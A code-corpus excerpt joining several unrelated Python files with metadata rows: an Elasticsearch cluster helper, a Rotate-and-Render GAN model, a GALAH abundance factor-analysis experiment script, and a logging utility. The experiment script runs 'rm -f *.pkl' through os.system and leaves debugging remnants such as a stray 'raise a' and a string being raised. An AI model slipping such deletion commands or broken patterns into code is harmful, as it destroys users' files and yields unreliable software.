raise StorageNotExistException()
return cluster_info[0]
def get_cluster_info_by_table(self, table_id):
"""
根据result_table_id查询集群信息
:return:
"""
cluster_info = TransferApi.get_result_table_storage(
{"result_table_list": table_id, "storage_type": STORAGE_CLUSTER_TYPE}
)
if not cluster_info.get(table_id):
raise StorageNotExistException()
return cluster_info[table_id]
@classmethod
def get_storage_capacity(cls, bk_biz_id, storage_clusters):
storage = {"storage_capacity": 0, "storage_used": 0}
if int(settings.ES_STORAGE_CAPACITY) <= 0:
return storage
biz_storage = StorageCapacity.objects.filter(bk_biz_id=bk_biz_id).first()
storage["storage_capacity"] = int(settings.ES_STORAGE_CAPACITY)
if biz_storage:
storage["storage_capacity"] = biz_storage.storage_capacity
storage_used = (
StorageUsed.objects.filter(bk_biz_id=bk_biz_id, storage_cluster_id__in=storage_clusters)
.all()
.aggregate(total=Sum("storage_used"))
)
if storage_used:
storage["storage_used"] = round(storage_used.get("total", 0) or 0, 2)
return storage
def cluster_nodes(self):
result = EsRoute(scenario_id=Scenario.ES, storage_cluster_id=self.cluster_id).cluster_nodes_stats()
return [
{
"name": node["name"],
"ip": node["host"],
"cpu_use": node["os"]["cpu"]["percent"],
"disk_use": node["fs"]["total"]["available_in_bytes"] / node["fs"]["total"]["total_in_bytes"],
"jvm_mem_use": node["jvm"]["mem"]["heap_used_percent"],
"tag": node["attributes"].get("tag", ""),
}
for node in result.get("nodes").values()
]
def indices(self):
indices_info = EsRoute(scenario_id=Scenario.ES, storage_cluster_id=self.cluster_id).cat_indices()
indices_info = self.sort_indices(indices_info)
ret = defaultdict(dict)
other_indices = {"index_pattern": "other", "indices": []}
for indices in indices_info:
is_bklog_rt, rt = self._match_bklog_indices(indices["index"])
if is_bklog_rt and not indices["index"].startswith("write"):
ret[rt]["index_pattern"] = rt
ret[rt].setdefault("indices", []).append(indices)
continue
other_indices["indices"].append(indices)
result = []
for index in ret.values():
result.append(index)
result.append(other_indices)
return result
def _match_bklog_indices(self, index: str) -> (bool, str):
pattern = re.compile(BKLOG_RESULT_TABLE_PATTERN)
match = pattern.findall(index)
if match:
return True, match[0]
return False, ""
@staticmethod
def sort_indices(indices: list):
def compare_indices_by_date(index_a, index_b):
index_a = index_a.get("index")
index_b = index_b.get("index")
def convert_to_normal_date_tuple(index_name) -> tuple:
# example 1: 2_bklog_xxxx_20200321_1 -> (20200321, 1)
# example 2: 2_xxxx_2020032101 -> (20200321, 1)
result = re.findall(r"(\d{8})_(\d{1,7})$", index_name) or re.findall(r"(\d{8})(\d{2})$", index_name)
if result:
return result[0][0], int(result[0][1])
# not match
return index_name, 0
converted_index_a = convert_to_normal_date_tuple(index_a)
converted_index_b = convert_to_normal_date_tuple(index_b)
return (converted_index_a > converted_index_b) - (converted_index_a < converted_index_b)
return sorted(indices, key=functools.cmp_to_key(compare_indices_by_date), reverse=True)
def repository(self, bk_biz_id=None, cluster_id=None):
cluster_info = self.list(bk_biz_id=bk_biz_id, cluster_id=cluster_id, is_default=False)
cluster_info_by_id = {cluster["cluster_config"]["cluster_id"]: cluster for cluster in cluster_info}
repository_info = TransferApi.list_es_snapshot_repository({"cluster_ids": list(cluster_info_by_id.keys())})
for repository in repository_info:
repository.update(
{
"cluster_name": cluster_info_by_id[repository["cluster_id"]]["cluster_config"]["cluster_name"],
"cluster_source_name": cluster_info_by_id[repository["cluster_id"]].get("source_name"),
"cluster_source_type": cluster_info_by_id[repository["cluster_id"]].get("source_type"),
"create_time": format_user_time_zone(repository["create_time"], get_local_param("time_zone")),
}
)
repository.pop("settings")
return repository_info
| 40.950276 | 118 | 0.616601 |
14a852167c96b6fd3935ed85b7f84704d2379bb7 | 16,898 | py | Python | models/rotatespade_model.py | Jack12xl/Rotate-and-Render | 6f04aeaf4bb631cdc8e694277bf8fd22e6a7df07 | [
"CC-BY-4.0"
] | null | null | null | models/rotatespade_model.py | Jack12xl/Rotate-and-Render | 6f04aeaf4bb631cdc8e694277bf8fd22e6a7df07 | [
"CC-BY-4.0"
] | null | null | null | models/rotatespade_model.py | Jack12xl/Rotate-and-Render | 6f04aeaf4bb631cdc8e694277bf8fd22e6a7df07 | [
"CC-BY-4.0"
] | null | null | null | import torch
import models.networks as networks
import util.util as util
from data import curve
import numpy as np
import os
class RotateSPADEModel(torch.nn.Module):
@staticmethod
def modify_commandline_options(parser, is_train):
networks.modify_commandline_options(parser, is_train)
return parser
def __init__(self, opt):
super(RotateSPADEModel, self).__init__()
self.opt = opt
self.save_dir = os.path.join(opt.checkpoints_dir, opt.name)
self.FloatTensor = torch.cuda.FloatTensor if self.use_gpu() \
else torch.FloatTensor
self.ByteTensor = torch.cuda.ByteTensor if self.use_gpu() \
else torch.ByteTensor
self.real_image = torch.zeros(opt.batchSize, 3, opt.crop_size, opt.crop_size)
self.input_semantics = torch.zeros(opt.batchSize, 3, opt.crop_size, opt.crop_size)
self.netG, self.netD, self.netE, self.netD_rotate = self.initialize_networks(opt)
# set loss functions
if opt.isTrain:
self.criterionGAN = networks.GANLoss(
opt.gan_mode, tensor=self.FloatTensor, opt=self.opt)
self.criterionFeat = torch.nn.L1Loss()
if not opt.no_vgg_loss:
self.criterionVGG = networks.VGGLoss(self.opt)
if opt.use_vae:
self.KLDLoss = networks.KLDLoss()
def landmark_68_to_5(self, t68):
le = t68[36:42, :].mean(axis=0, keepdims=True)
re = t68[42:48, :].mean(axis=0, keepdims=True)
no = t68[31:32, :]
lm = t68[48:49, :]
rm = t68[54:55, :]
t5 = np.concatenate([le, re, no, lm, rm], axis=0)
t5 = t5.reshape(10)
t5 = torch.from_numpy(t5).unsqueeze(0).cuda()
return t5
def get_seg_map(self, landmarks, no_guassian=False, size=256, original_angles=None):
landmarks = landmarks[:, :, :2].cpu().numpy().astype(np.float)
all_heatmap = []
all_orig_heatmap = []
if original_angles is None:
original_angles = torch.zeros(landmarks.shape[0])
# key_points = []
for i in range(landmarks.shape[0]):
heatmap = curve.points_to_heatmap_68points(landmarks[i], 13, size, self.opt.heatmap_size)
heatmap2 = curve.combine_map(heatmap, no_guassian=no_guassian)
if self.opt.isTrain:
if np.random.randint(2):
heatmap = np.zeros_like(heatmap)
else:
if torch.abs(original_angles[i]) < 0.255:
heatmap = np.zeros_like(heatmap)
all_heatmap.append(heatmap2)
all_orig_heatmap.append(heatmap)
# key_points.append(self.landmark_68_to_5(landmarks[i]))
all_heatmap = np.stack(all_heatmap, axis=0)
all_orig_heatmap = np.stack(all_orig_heatmap, axis=0)
all_heatmap = torch.from_numpy(all_heatmap.astype(np.float32)).cuda()
all_orig_heatmap = torch.from_numpy(all_orig_heatmap.astype(np.float32)).cuda()
all_orig_heatmap = all_orig_heatmap.permute(0, 3, 1, 2)
all_orig_heatmap[all_orig_heatmap > 0] = 2.0
return all_heatmap, all_orig_heatmap
# Entry point for all calls involving forward pass
# of deep networks. We used this approach since DataParallel module
# can't parallelize custom functions, we branch to different
# routines based on |mode|.
# |data|: dictionary of the input data
def forward(self, data, mode):
real_image = data['image']
orig_landmarks = data['orig_landmarks']
rotated_landmarks = data['rotated_landmarks']
original_angles = data['original_angles']
self.orig_seg, orig_seg_all = \
self.get_seg_map(orig_landmarks, self.opt.no_gaussian_landmark, self.opt.crop_size, original_angles)
self.rotated_seg, rotated_seg_all = \
self.get_seg_map(rotated_landmarks, self.opt.no_gaussian_landmark, self.opt.crop_size, original_angles)
input_semantics = data['mesh']
rotated_mesh = data['rotated_mesh']
if self.opt.label_mask:
input_semantics = (input_semantics + orig_seg_all[:, 4].unsqueeze(1) + orig_seg_all[:, 0].unsqueeze(1))
rotated_mesh = (rotated_mesh + rotated_seg_all[:, 4].unsqueeze(1) + rotated_seg_all[:, 0].unsqueeze(1))
input_semantics[input_semantics >= 1] = 0
rotated_mesh[rotated_mesh >= 1] = 0
if mode == 'generator':
g_loss, generated = self.compute_generator_loss(
input_semantics, real_image, self.orig_seg, netD=self.netD, mode=mode, no_ganFeat_loss=self.opt.no_ganFeat_loss,
no_vgg_loss=self.opt.no_vgg_loss, lambda_D=self.opt.lambda_D)
return g_loss, generated, input_semantics
if mode == 'generator_rotated':
g_loss, generated = self.compute_generator_loss(
rotated_mesh, real_image, self.rotated_seg, netD=self.netD_rotate, mode=mode, no_ganFeat_loss=True,
no_vgg_loss=self.opt.no_vgg_loss, lambda_D=self.opt.lambda_rotate_D)
return g_loss, generated, rotated_mesh
elif mode == 'discriminator':
d_loss = self.compute_discriminator_loss(
input_semantics, real_image, self.orig_seg, netD=self.netD, lambda_D=self.opt.lambda_D)
return d_loss
elif mode == 'discriminator_rotated':
d_loss = self.compute_discriminator_loss(
rotated_mesh, real_image, self.rotated_seg, self.netD_rotate, lambda_D=self.opt.lambda_rotate_D)
return d_loss
elif mode == 'encode_only':
z, mu, logvar = self.encode_z(real_image)
return mu, logvar
elif mode == 'inference':
with torch.no_grad():
if self.opt.label_mask:
rotated_mesh = (
rotated_mesh + rotated_seg_all[:, 4].unsqueeze(1) + rotated_seg_all[:, 0].unsqueeze(1))
rotated_mesh[rotated_mesh >= 1] = 0
fake_image, _ = self.generate_fake(input_semantics, real_image, self.orig_seg)
fake_rotate, _ = self.generate_fake(rotated_mesh, real_image, self.rotated_seg)
return fake_image, fake_rotate
else:
raise ValueError("|mode| is invalid")
def create_optimizers(self, opt):
G_params = list(self.netG.parameters())
if opt.use_vae:
G_params += list(self.netE.parameters())
if opt.isTrain:
if opt.train_rotate:
D_params = list(self.netD.parameters()) + list(self.netD_rotate.parameters())
else:
D_params = self.netD.parameters()
if opt.no_TTUR:
beta1, beta2 = opt.beta1, opt.beta2
G_lr, D_lr = opt.lr, opt.lr
else:
beta1, beta2 = 0, 0.9
G_lr, D_lr = opt.lr / 2, opt.lr * 2
optimizer_G = torch.optim.Adam(G_params, lr=G_lr, betas=(beta1, beta2))
optimizer_D = torch.optim.Adam(D_params, lr=D_lr, betas=(beta1, beta2))
return optimizer_G, optimizer_D
def save(self, epoch):
util.save_network(self.netG, 'G', epoch, self.opt)
util.save_network(self.netD, 'D', epoch, self.opt)
if self.opt.train_rotate:
util.save_network(self.netD_rotate, 'D_rotate', epoch, self.opt)
if self.opt.use_vae:
util.save_network(self.netE, 'E', epoch, self.opt)
############################################################################
# Private helper methods
############################################################################
def initialize_networks(self, opt):
netG = networks.define_G(opt)
netD = networks.define_D(opt) if opt.isTrain else None
netD_rotate = networks.define_D(opt) if opt.isTrain else None
netE = networks.define_E(opt) if opt.use_vae else None
pretrained_path = ''
if not opt.isTrain or opt.continue_train:
self.load_network(netG, 'G', opt.which_epoch, pretrained_path)
if opt.isTrain and not opt.noload_D:
self.load_network(netD, 'D', opt.which_epoch, pretrained_path)
self.load_network(netD_rotate, 'D_rotate', opt.which_epoch, pretrained_path)
if opt.use_vae:
self.load_network(netE, 'E', opt.which_epoch, pretrained_path)
else:
if opt.load_separately:
netG = self.load_separately(netG, 'G', opt)
if not opt.noload_D:
netD = self.load_separately(netD, 'D', opt)
netD_rotate = self.load_separately(netD_rotate, 'D_rotate', opt)
if opt.use_vae:
netE = self.load_separately(netE, 'E', opt)
return netG, netD, netE, netD_rotate
# preprocess the input, such as moving the tensors to GPUs and
# transforming the label map to one-hot encoding
def compute_generator_loss(self, input_semantics, real_image, seg, netD, mode, no_ganFeat_loss=False, no_vgg_loss=False, lambda_D=1):
G_losses = {}
fake_image, KLD_loss = self.generate_fake(
input_semantics, real_image, seg, compute_kld_loss=self.opt.use_vae)
if self.opt.use_vae:
G_losses['KLD'] = KLD_loss
pred_fake, pred_real = self.discriminate(
input_semantics, fake_image, real_image, seg, netD)
G_losses['GAN'] = self.criterionGAN(pred_fake, True,
for_discriminator=False) * lambda_D
if not no_ganFeat_loss:
num_D = len(pred_fake)
GAN_Feat_loss = self.FloatTensor(1).fill_(0)
for i in range(num_D): # for each discriminator
# last output is the final prediction, so we exclude it
num_intermediate_outputs = len(pred_fake[i]) - 1
for j in range(num_intermediate_outputs): # for each layer output
unweighted_loss = self.criterionFeat(
pred_fake[i][j], pred_real[i][j].detach())
if j == 0:
unweighted_loss *= self.opt.lambda_image
GAN_Feat_loss += unweighted_loss * self.opt.lambda_feat / num_D
G_losses['GAN_Feat'] = GAN_Feat_loss
if not no_vgg_loss:
if mode == 'generator_rotated':
num = 2
else:
num = 0
G_losses['VGG'] = self.criterionVGG(fake_image, real_image, num) \
* self.opt.lambda_vgg
return G_losses, fake_image
def compute_discriminator_loss(self, input_semantics, real_image, seg, netD, lambda_D=1):
D_losses = {}
with torch.no_grad():
fake_image, _ = self.generate_fake(input_semantics, real_image, seg)
fake_image = fake_image.detach()
fake_image.requires_grad_()
pred_fake, pred_real= self.discriminate(
input_semantics, fake_image, real_image, seg, netD)
D_losses['D_Fake'] = self.criterionGAN(pred_fake, False,
for_discriminator=True) * lambda_D
D_losses['D_real'] = self.criterionGAN(pred_real, True,
for_discriminator=True) * lambda_D
return D_losses
def encode_z(self, real_image):
mu, logvar = self.netE(real_image)
z = self.reparameterize(mu, logvar)
return z, mu, logvar
def generate_fake(self, input_semantics, real_image, seg, compute_kld_loss=False):
z = None
KLD_loss = None
if self.opt.use_vae:
z, mu, logvar = self.encode_z(real_image)
if compute_kld_loss:
KLD_loss = self.KLDLoss(mu, logvar) * self.opt.lambda_kld
fake_image = self.netG(input_semantics, seg)
assert (not compute_kld_loss) or self.opt.use_vae, \
"You cannot compute KLD loss if opt.use_vae == False"
return fake_image, KLD_loss
# Given fake and real image, return the prediction of discriminator
# for each fake and real image.
def discriminate(self, input_semantics, fake_image, real_image, seg, netD):
if self.opt.D_input == "concat":
fake_concat = torch.cat([seg, fake_image], dim=1)
real_concat = torch.cat([self.orig_seg, real_image], dim=1)
else:
fake_concat = fake_image
real_concat = real_image
# In Batch Normalization, the fake and real images are
# recommended to be in the same batch to avoid disparate
# statistics in fake and real images.
# So both fake and real images are fed to D all at once.
fake_and_real = torch.cat([fake_concat, real_concat], dim=0)
discriminator_out = netD(fake_and_real)
pred_fake, pred_real = self.divide_pred(discriminator_out)
return pred_fake, pred_real
# Take the prediction of fake and real images from the combined batch
def divide_pred(self, pred):
# the prediction contains the intermediate outputs of multiscale GAN,
# so it's usually a list
if type(pred) == list:
fake = []
real = []
for p in pred:
fake.append([tensor[:tensor.size(0) // 2] for tensor in p])
real.append([tensor[tensor.size(0) // 2:] for tensor in p])
else:
fake = pred[:pred.size(0) // 2]
# rotate_fake = pred[pred.size(0) // 3: pred.size(0) * 2 // 3]
real = pred[pred.size(0)//2 :]
return fake, real
def get_edges(self, t):
edge = self.ByteTensor(t.size()).zero_()
edge[:, :, :, 1:] = edge[:, :, :, 1:] | (t[:, :, :, 1:] != t[:, :, :, :-1])
edge[:, :, :, :-1] = edge[:, :, :, :-1] | (t[:, :, :, 1:] != t[:, :, :, :-1])
edge[:, :, 1:, :] = edge[:, :, 1:, :] | (t[:, :, 1:, :] != t[:, :, :-1, :])
edge[:, :, :-1, :] = edge[:, :, :-1, :] | (t[:, :, 1:, :] != t[:, :, :-1, :])
return edge.float()
def load_separately(self, network, network_label, opt):
load_path = None
if network_label == 'G':
load_path = opt.G_pretrain_path
elif network_label == 'D':
load_path = opt.D_pretrain_path
elif network_label == 'D_rotate':
load_path = opt.D_rotate_pretrain_path
elif network_label == 'E':
load_path = opt.E_pretrain_path
if load_path is not None:
if os.path.isfile(load_path):
print("=> loading checkpoint '{}'".format(load_path))
checkpoint = torch.load(load_path)
util.copy_state_dict(checkpoint, network)
else:
print("no load_path")
return network
def load_network(self, network, network_label, epoch_label, save_dir=''):
save_filename = '%s_net_%s.pth' % (epoch_label, network_label)
if not save_dir:
save_dir = self.save_dir
save_path = os.path.join(save_dir, save_filename)
if not os.path.isfile(save_path):
print('%s not exists yet!' % save_path)
if network_label == 'G':
raise ('Generator must exist!')
else:
# network.load_state_dict(torch.load(save_path))
try:
network.load_state_dict(torch.load(save_path))
except:
pretrained_dict = torch.load(save_path)
model_dict = network.state_dict()
try:
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
network.load_state_dict(pretrained_dict)
if self.opt.verbose:
print(
'Pretrained network %s has excessive layers; Only loading layers that are used' % network_label)
except:
print('Pretrained network %s has fewer layers; The following are not initialized:' % network_label)
for k, v in pretrained_dict.items():
if v.size() == model_dict[k].size():
model_dict[k] = v
not_initialized = set()
for k, v in model_dict.items():
if k not in pretrained_dict or v.size() != pretrained_dict[k].size():
not_initialized.add(k.split('.')[0])
print(sorted(not_initialized))
network.load_state_dict(model_dict)
def reparameterize(self, mu, logvar):
std = torch.exp(0.5 * logvar)
eps = torch.randn_like(std)
return eps.mul(std) + mu
def use_gpu(self):
return len(self.opt.gpu_ids) > 0
| 42.779747 | 137 | 0.586105 |
67257598368a15646fcafd54069b287508ea5b4f | 12,272 | py | Python | article/experiments/exp3.py | andycasey/mcfa | 8c4135e665e47006e9ca725e8bfc67315508366e | [
"MIT"
] | 2 | 2018-08-23T06:54:17.000Z | 2021-03-05T14:38:41.000Z | article/experiments/exp3.py | andycasey/mcfa | 8c4135e665e47006e9ca725e8bfc67315508366e | [
"MIT"
] | null | null | null | article/experiments/exp3.py | andycasey/mcfa | 8c4135e665e47006e9ca725e8bfc67315508366e | [
"MIT"
] | null | null | null |
"""
Experiment using all GALAH data.
"""
from __future__ import division # Just in case. Use Python 3.
import os
import sys
import pickle
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import yaml
from matplotlib.ticker import MaxNLocator
from collections import Counter
from scipy import linalg
from hashlib import md5
sys.path.insert(0, "../../")
from mcfa import (mcfa, grid_search, mpl_utils, utils)
import galah_dr2 as galah
matplotlib.style.use(mpl_utils.mpl_style)
here = os.path.dirname(os.path.realpath(__file__))
with open("config.yml") as fp:
config = yaml.load(fp)
print(f"Config: {config}")
np.random.seed(config["random_seed"])
prefix = os.path.basename(__file__)[:-3]
unique_hash = md5((f"{config}").encode("utf-8")).hexdigest()[:5]
unique_config_path = f"{unique_hash}.yml"
if os.path.exists(unique_config_path):
print(f"Warning: this configuration already exists: {unique_config_path}")
with open(unique_config_path, "w") as fp:
yaml.dump(config, fp)
with open(__file__, "r") as fp:
code = fp.read()
with open(f"{unique_hash}-{__file__}", "w") as fp:
fp.write(code)
def savefig(fig, suffix):
here = os.path.dirname(os.path.realpath(__file__))
filename = os.path.join(here, f"{prefix}-{unique_hash}-{suffix}")
fig.savefig(f"{filename}.png", dpi=150)
fig.savefig(f"{filename}.pdf", dpi=300)
import os
os.system("rm -f *.pkl")
N_elements = 20
use_galah_flags = config["use_galah_flags"]
mcfa_kwds = dict()
mcfa_kwds.update(config["mcfa_kwds"])
elements = config[prefix]["elements"]
if config[prefix]["ignore_elements"] is not None:
elements = [el for el in elements if el not in config[prefix]["ignore_elements"]]
print(elements)
mask = galah.get_abundance_mask(elements, use_galah_flags=use_galah_flags)
galah_cuts = config["exp3"]["galah_cuts"]
if galah_cuts is not None:
print(f"Applying cuts: {galah_cuts}")
for k, (lower, upper) in galah_cuts.items():
mask *= (upper >= galah.data[k]) * (galah.data[k] >= lower)
print(f"Number of stars: {sum(mask)}")
X_H, label_names = galah.get_abundances_wrt_h(elements, mask=mask)
print(f"Data shape: {X_H.shape}")
def convert_xh_to_xy(X_H, label_names, y_label):
index = label_names.index(y_label)
y_h = X_H[:, index]
offsets = np.zeros_like(X_H)
for i, label_name in enumerate(label_names):
if label_name == y_label: continue
offsets[:, i] = y_h
return X_H - offsets
if config["wrt_x_fe"]:
X = convert_xh_to_xy(X_H, label_names, "fe_h")
else:
X = X_H
if not config["log_abundance"]:
X = 10**X
if config["subtract_mean"]:
X = X - np.mean(X, axis=0)
N, D = X.shape
# Do a gridsearch.
gs_options = config["exp3"]["gridsearch"]
max_n_latent_factors = gs_options["max_n_latent_factors"]
max_n_components = gs_options["max_n_components"]
Js = 1 + np.arange(max_n_latent_factors)
Ks = 1 + np.arange(max_n_components)
N_inits = gs_options["n_inits"]
results_path = f"{prefix}-gridsearch-results.pkl"
if os.path.exists(results_path):
with open(results_path, "rb") as fp:
Jg, Kg, converged, meta, X, mcfa_kwds = pickle.load(fp)
else:
Jg, Kg, converged, meta = grid_search.grid_search(Js, Ks, X,
N_inits=N_inits, mcfa_kwds=mcfa_kwds)
with open(results_path, "wb") as fp:
pickle.dump((Jg, Kg, converged, meta, X, mcfa_kwds), fp)
ll = meta["ll"]
bic = meta["bic"]
mml = meta["message_length"]
J_best_ll, K_best_ll = grid_search.best(Js, Ks, -ll)
J_best_bic, K_best_bic = grid_search.best(Js, Ks, bic)
J_best_mml, K_best_mml = grid_search.best(Js, Ks, mml)
print(f"Best log likelihood at J = {J_best_ll} and K = {K_best_ll}")
print(f"Best BIC value found at J = {J_best_bic} and K = {K_best_bic}")
print(f"Best MML value found at J = {J_best_mml} and K = {K_best_mml}")
# Plot some contours.
plot_filled_contours_kwds = dict(converged=converged,
marker_function=np.nanargmin, N=100,
cmap="Spectral_r")
fig_ll = mpl_utils.plot_filled_contours(Jg, Kg, -ll,
colorbar_label=r"$-\log\mathcal{L}$",
**plot_filled_contours_kwds)
savefig(fig_ll, "gridsearch-ll")
fig_bic = mpl_utils.plot_filled_contours(Jg, Kg, bic,
colorbar_label=r"$\textrm{BIC}$",
**plot_filled_contours_kwds)
savefig(fig_bic, "gridsearch-bic")
fig_mml = mpl_utils.plot_filled_contours(Jg, Kg, mml,
colorbar_label=r"$\textrm{MML}$",
**plot_filled_contours_kwds)
savefig(fig_mml, "gridsearch-mml")
model = meta["best_models"][config["adopted_metric"]]
latex_label_names = [r"$\textrm{{{0}}}$".format(ea.split("_")[0].title()) for ea in label_names]
# Draw unrotated.
J_max = config["max_n_latent_factors_for_colormap"]
J_max = 12
cmap = mpl_utils.discrete_cmap(J_max, base_cmap="Spectral")
colors = [cmap(j) for j in range(J_max)]#[::-1]
A_est = model.theta_[model.parameter_names.index("A")]
A_astrophysical = np.zeros_like(A_est)#np.random.normal(0, 0.1, size=A_est.shape)
for i, tes in enumerate(config["grouped_elements"][:model.n_latent_factors]):
for j, te in enumerate(tes):
try:
idx = label_names.index("{0}_h".format(te.lower()))
except ValueError:
print(f"Skipping {te}")
else:
count = sum([(te in foo) for foo in config["grouped_elements"][:model.n_latent_factors]])
A_astrophysical[idx, i] = 1.0/count
A_astrophysical /= np.clip(np.sqrt(np.sum(A_astrophysical, axis=0)), 1, np.inf)
# Un-assigned columns
for column_index in np.where(np.all(A_astrophysical == 0, axis=0))[0]:
print(f"Warning: unassigned column index: {column_index}")
A_astrophysical[:, column_index] = np.random.normal(0, 1e-2, size=D)
if config["correct_A_astrophysical"]:
AL = linalg.cholesky(A_astrophysical.T @ A_astrophysical)
A_astrophysical = A_astrophysical @ linalg.solve(AL, np.eye(model.n_latent_factors))
max_n_rotations = 3
for each in range(max_n_rotations):
A_est = model.theta_[model.parameter_names.index("A")]
R, p_opt, cov, *_ = utils.find_rotation_matrix(A_astrophysical, A_est,
full_output=True)
R_opt = utils.exact_rotation_matrix(A_astrophysical, A_est,
p0=np.random.uniform(-np.pi, np.pi, model.n_latent_factors**2))
# WTF check R_opt.
AL = linalg.cholesky(R_opt.T @ R_opt)
R_opt2 = R_opt @ linalg.solve(AL, np.eye(model.n_latent_factors))
chi1 = np.sum(np.abs(A_est @ R - A_astrophysical))
chi2 = np.sum(np.abs(A_est @ R_opt2 - A_astrophysical))
R = R_opt2 if chi2 < chi1 else R
# Now make it a valid rotation matrix.
model.rotate(R, X=X, ensure_valid_rotation=True)
import pickle
with open(f"{unique_hash}-exp3-model.pkl", "wb") as fp:
pickle.dump(model, fp)
"""
J = model.n_latent_factors
L = model.theta_[model.parameter_names.index("A")]
elements = [ea.split("_")[0].title() for ea in label_names]
A_est = model.theta_[model.parameter_names.index("A")]
A_astrophysical = np.zeros_like(A_est)#np.random.normal(0, 0.1, size=A_est.shape)
for i, tes in enumerate(config["grouped_elements"][:model.n_latent_factors]):
for j, te in enumerate(tes):
try:
idx = label_names.index("{0}_h".format(te.lower()))
except ValueError:
print(f"Skipping {te}")
else:
count = sum([(te in foo) for foo in config["grouped_elements"][:model.n_latent_factors]])
A_astrophysical[idx, i] = 1.0/count
A_astrophysical /= np.clip(np.sqrt(np.sum(A_astrophysical, axis=0)), 1, np.inf)
# Un-assigned columns
for column_index in np.where(np.all(A_astrophysical == 0, axis=0))[0]:
print(f"Warning: unassigned column index: {column_index}")
A_astrophysical[:, column_index] = np.random.normal(0, 1e-2, size=D)
AL = linalg.cholesky(A_astrophysical.T @ A_astrophysical)
A_astrophysical = A_astrophysical @ linalg.solve(AL, np.eye(model.n_latent_factors))
R, p_opt, cov, *_ = utils.find_rotation_matrix(A_astrophysical, A_est,
full_output=True)
R_opt = utils.exact_rotation_matrix(A_astrophysical, A_est,
p0=np.random.uniform(-np.pi, np.pi, model.n_latent_factors**2))
# WTF check R_opt.
AL = linalg.cholesky(R_opt.T @ R_opt)
R_opt2 = R_opt @ linalg.solve(AL, np.eye(model.n_latent_factors))
chi1 = np.sum(np.abs(A_est @ R - A_astrophysical))
chi2 = np.sum(np.abs(A_est @ R_opt2 - A_astrophysical))
R = R_opt2 if chi2 < chi1 else R
# Now make it a valid rotation matrix.
model.rotate(R, X=X, ensure_valid_rotation=True)
"""
fig_fac = mpl_utils.plot_factor_loads_and_contributions(model, X,
label_names=latex_label_names, colors=colors,
target_loads=A_astrophysical)
savefig(fig_fac, "latent-factors-and-contributions-with-targets")
fig_fac = mpl_utils.plot_factor_loads_and_contributions(model, X,
label_names=latex_label_names, colors=colors)
savefig(fig_fac, "latent-factors-and-contributions")
raise a
# Plot clustering in data space and latent space.
# For the latent space we will just use a corner plot.
component_cmap = mpl_utils.discrete_cmap(7, base_cmap="Spectral_r")
fig = mpl_utils.plot_latent_space(model, X, ellipse_kwds=dict(alpha=0), s=10, edgecolor="none", alpha=1, c=[component_cmap(_) for _ in np.argmax(model.tau_, axis=1)], show_ticks=True,
label_names=[r"$\mathbf{{S}}_{{{0}}}$".format(i + 1) for i in range(model.n_latent_factors)])
for ax in fig.axes:
if ax.is_last_row():
ax.set_ylim(-1, 1)
ax.set_yticks([-1, 0, 1])
fig.tight_layout()
savefig(fig, "latent-space")
# For the data space we will use N x 2 panels of [X/Fe] vs [Fe/H], coloured by their responsibility.
#X_H, label_names = galah.get_abundances_wrt_h(elements, mask=mask)
X_H, label_names = galah.get_abundances_wrt_h(elements, mask=mask)
fig, axes = plt.subplots(5, 3, figsize=(7.1, 9.0))
axes = np.atleast_1d(axes).flatten()
x = X_H.T[label_names.index("fe_h")]
c = np.argmax(model.tau_, axis=1)
K = model.n_components
y_idx = 0
for i, ax in enumerate(axes):
if label_names[i] == "fe_h":
y_idx += 1
y = X_H.T[y_idx] - x
ax.scatter(x, y, c=[component_cmap(_) for _ in c], s=10, edgecolor="none", rasterized=True)
element = label_names[y_idx].split("_")[0].title()
ax.set_ylabel(r"$[\textrm{{{0}/Fe}}]$".format(element))
y_idx += 1
x_lims = (-1.5, 0.5)
y_lims = (-0.5, 1.0)
for ax in axes:
ax.set_xlim(x_lims)
ax.set_ylim(y_lims)
ax.set_xticks([-1.5, -0.5, 0.5])
#ax.set_yticks([-0.5, 0.25, 1.0, 1.75])
ax.set_yticks([-0.5, 0, 0.5, 1.0])
if ax.is_last_row():
ax.set_xlabel(r"$[\textrm{Fe/H}]$")
else:
ax.set_xticklabels([])
ax.plot(x_lims, [0, 0], ":", c="#666666", lw=0.5, zorder=-1)
ax.plot([0, 0], y_lims, ":", c="#666666", lw=0.5, zorder=-1)
fig.tight_layout()
savefig(fig, "data-space")
latex_elements = [r"$\textrm{{{0}}}$".format(le.split("_")[0].title()) for le in label_names]
fig_scatter = mpl_utils.plot_specific_scatter(model,
steps=True,
xlabel="",
xticklabels=latex_elements,
ylabel=r"$\textrm{specific scatter / dex}$",
ticker_pad=20)
fig_scatter.axes[0].set_yticks(np.arange(0, 0.20, 0.05))
savefig(fig_scatter, "specific-scatter")
here = os.path.dirname(os.path.realpath(__file__))
filename = os.path.join(here, f"{prefix}-{unique_hash}-data.fits")
subset = galah.data[mask]
subset["association"] = np.argmax(model.tau_, axis=1)
subset.write(filename, overwrite=True)
| 29.149644 | 183 | 0.641705 |
41082b631863e667da63c3e0b99d92600e6d8ee7 | 615 | py | Python | xd/utils/logger.py | smly/xview3-kohei-solution | f6933ff437240c6c07fd61c3bd4290b639d17531 | [
"MIT"
] | 2 | 2022-01-14T08:00:34.000Z | 2022-01-17T12:42:44.000Z | xd/utils/logger.py | smly/xview3-kohei-solution | f6933ff437240c6c07fd61c3bd4290b639d17531 | [
"MIT"
] | null | null | null | xd/utils/logger.py | smly/xview3-kohei-solution | f6933ff437240c6c07fd61c3bd4290b639d17531 | [
"MIT"
] | 1 | 2022-01-31T21:25:21.000Z | 2022-01-31T21:25:21.000Z | import sys
from logging import INFO, FileHandler, Formatter, StreamHandler
def set_logger(logger):
logformat = "%(asctime)s %(levelname)s %(message)s"
handler_out = StreamHandler(sys.stdout)
handler_out.setLevel(INFO)
handler_out.setFormatter(Formatter(logformat))
logger.setLevel(INFO)
logger.addHandler(handler_out)
def add_log_filehandler(logger, conf_name: str, logfile_path: str):
logformat = "%(asctime)s %(levelname)s %(message)s"
handler = FileHandler(logfile_path)
handler.setLevel(INFO)
handler.setFormatter(Formatter(logformat))
logger.addHandler(handler)
| 30.75 | 67 | 0.744715 |
83a973dd65aa3363e9d8ad4c07b99900e2dd9857 | 242,711 | py | Python | tensorflow/python/framework/ops.py | davidkirwan/tensorflow | 185a465225a520a1855145efda58b17b1a83d3a5 | [
"Apache-2.0"
